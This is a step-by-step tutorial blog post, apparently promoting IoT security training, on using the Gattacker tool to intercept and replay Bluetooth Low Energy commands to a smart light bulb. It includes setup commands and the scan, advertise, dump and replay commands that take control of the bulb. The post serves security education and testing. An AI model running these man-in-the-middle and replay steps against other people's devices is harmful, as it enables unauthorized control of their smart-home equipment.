Exploiting Bluetooth Low Energy using Gattacker for IoT - Step-by-Step Guide

In this post, we are going to discuss about how to take over a BLE based IoT smart bulb, sniff the communication packets and perform modification and replay based attacks - all in a setup that costs < $10.

Some of the things we are going to cover in this post:

  • Installing and Configuring Gattacker
  • Analyzing Advertisement and Service packets for an IoT device
  • Overhearing and dumping the data transferred between the mobile and the device
  • Performing a replay attack with the dumped file

In case you are interested in a real-world version of the training class for your organization covering topics such as BLE sniffing, exploitation, Zigbee and more, feel free to contact us at secure@attify.com or have a look at Offensive IoT Exploitation. Our upcoming public classes schedule is available here - https://www.attify-store.com/collections/real-world-training/products/offensive-iot-exploitation-live-training .

In order to get started, we will need the below items:

Hardware

  • Laptop
  • BLE Dongles

Software

  • Gattacker
  • NRFConnect

Installing Gattacker and configuring it:

Steps to Perform

Step 1: To install Gattacker, you will need the latest version of node and npm. This can be done using the below command:

sudo apt-get install bluetooth bluez libbluetooth-dev libudev-dev

To install NodeJS, you can follow this guide

Step 2: Next, we need to install bleno as below:

npm install bleno
npm install noble

In case you get an error, ensure that you have correctly installed the node and npm packages earlier.

Step 3: Now install Gattacker using the command

npm install gattacker

Step 4: Repeat the same steps on another Virtual Machine (or system) as we will be requiring two machines - one for host and one for slave.

Step 5: Once done, plug in the ble adaptor and ensure that its plugged using sudo hciconfig.

Navigate to gattacker folder for the further steps

cd node_modules/gattacker

Step 6:

Next, we will need to edit the config.env in order to configure gattacker for our setup.

sudo nano config.env

Step 7: Here uncomment the NOBLE_HCI_DEVICE_ID and then replace it with the hciX where (X is the value which we found earlier through hciconfig) and save the file

Configuration of the slave machine

Let's find out the IP address of this slave machine.

Connection info of the slave

Step 8: Now in the host machine, plug in the BLE adaptor and follow the above steps. For the config.env follow the below steps:

  • uncomment the NOBLE_HCI_DEVICE_ID
  • uncomment the BLENO_HCI_DEVICE_ID

Assign them to the hciX value.

Once done, in the WS_SLAVE, replace it with the IP address of the slave machine as in the image:

Configuration of the host machine

Once done, save the configuration file. Now we are ready to start using Gattacker and exploit some IoT devices.

Using Gattacker to scan and store device information:

Steps to Perform

Step 1: Open up the slave VM and launch ws-slave.js as shown below:

sudo node ws-slave.js

Slave getting initiated

Step 2: Now in the host machine branch to the gattacker folder and launch scan as shown below

sudo node scan.js

Scan command

Now turn on the Magic blue bulb and hit Enter to see the message as below


Saving the advertisement packet of the magic blue

Now to save the services of the magic blue bulb use:

sudo node scan f81d7860753A where f81d7860753A is the peripheral name of the bulb as saved by gattacker.

Saving the service of the magic blue bulb

Now if you navigate to the device folder in the gattacker you can able to see both the files stored as in the image below

Folder containing the advertisement and the service packets of the bulb

Step 3: Now open up the file f81d7860753a_LEDBLE-7860753A.adv.json to see the advertisement info of the device

Advertisement info of the bulb

Step 4: And similarily, f81d7860753a.srv.json to see the service info of the device

service info of the bulb

Using gattacker to dump and replay the information:

Steps to Perform

Step 1: Follow the previous exercise to store the advertisement and the service packets. Now turn off the magic blue bulb and follow the steps below

Step 2: Once done, in the host machine start advertise.js with the additional flags.

sudo node advertise.js
-a devices/f81d7860753a_LEDBLE-7860753A.adv.json
-s devices/f81d7860753a.srv.json

Sniffing the communication between the devices

Now press enter and wait for the message below

Waiting for the bulb to turn on

Now power the bulb and you will see the message as below

attack initialised

Step 3: Now open the MAGICBLUE app from the phone and scan for devices

Scanned device in app

Step 4: Now connect to the device and in the host machine you can visulaize something like this

Success message of the client connection in the host

Step 5: In the mobile app, change the light bulb color.

Handles and the RGB values which has been changed from the app can be seen here

Now exit this by ctrl + c

Step 6: Now this value is saved in the dump folder so navigate to the dump folder and type the following command:

Dump files in dump folder

Open up the file:

sudo nano f81d7860753a.log

Now you will see something like this

Changed values saved as dump

Step 7:Now to replay this, we will have to delete the first 7 lines in this.

lines to be edited

After editing

Now save this file

Step 7: Now in the host machine after the mobile and the bulb is disconnected, type in the following command

sudo node replay.js -i dump/f81d7860753a.log -p f81d7860753a -s devices/f81d7860753a.srv.json**

Replay attack

Now you will observe this

 Replay info in host

Using gattacker to dump and replay the information with NRFConnect app:

Steps to Perform

Step 1: NRFConnect app supports XML files. Thus, we will need to change the log file obtained from the dump folder to a valid xml file as shown below:

node gattacker2nrf.js -i dump/f81d7860753a.log > dump/f81d7860753.xml

Command to convert to xml file

Navigate to dump file and see for the xml file with name f81d7860753.xml

Folder containing the f81d7860753.log and the converted f81d7860753.xml file

Now transfer this xml file to the mobile

Step 2: Next, download the NRFConnect app from the google play store. Once installed, open up the app, as well as power the Light bulb on. And scan the bulb using nrf connect app.

Advertisement of the bulb

Step 3: After connecting, press the orange icon located in the right bottom corner

connection status with bulb 

Step 4: You will be able to see something like this

Opening the macros to load the xml file

Step 5: Now press the download icon on the screen and browse to the folder where the xml file was transferred from the host.

loading the xml file 

Step 6: Here you will be able to notice the play option as shown below

dump file ready for replaying

Step 7: Now hit the play option to execute the replay attack on the bulb.

execution of the attack 

If you will look at the bulb now, the attack has successfully been executed, and we have been able to control a BLE enabled IoT Smart Light Bulb using Gattacker.

That is all for this blog post. In the upcoming blog posts, we will look into additional BLE exploitation, Zigbee exploitation and other topics.

Additional information below: